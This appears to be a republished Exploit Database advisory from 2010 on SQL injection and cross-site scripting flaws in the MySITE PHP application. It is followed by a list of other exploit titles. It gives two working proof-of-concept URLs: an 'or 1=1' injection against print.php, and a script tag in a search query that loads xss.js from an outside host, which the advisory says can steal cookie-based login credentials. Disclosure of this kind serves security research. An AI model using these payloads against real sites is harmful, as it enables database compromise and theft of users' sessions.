MySITE – SQL Injection / Cross-Site Scripting

Exploit Database
14 阅读

作者： MustLive

日期： 2010-09-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34769/

source: https://www.securityfocus.com/bid/43510/info

MySITE is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/print.php?id=1&pid=-1%20or%201=1 
http://www.example.com/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

last Exploits
MySITE – SQL Injection / Cross-Site Scripting的更多信息

Interscan Web Security Virtual Appliance 5.0 – Arbitrary File Download：
Cells Blog 3.3 – Reflected Cross-Site Scripting / Blind SQLite Injection：
ClipBucket 2.8.3 – Remote Code Execution：
PHP Classifieds 7.3 – Remote File Inclusion：
Easy Blog PHP Script 1.3a – ‘id’ SQL Injection：
JamWiki 1.1.5 – ‘num’ Cross-Site Scripting：
AirLive (Multiple Products) – OS Command Injection：
Home of Viral Images, Videos and Articles Script – SQL Injection：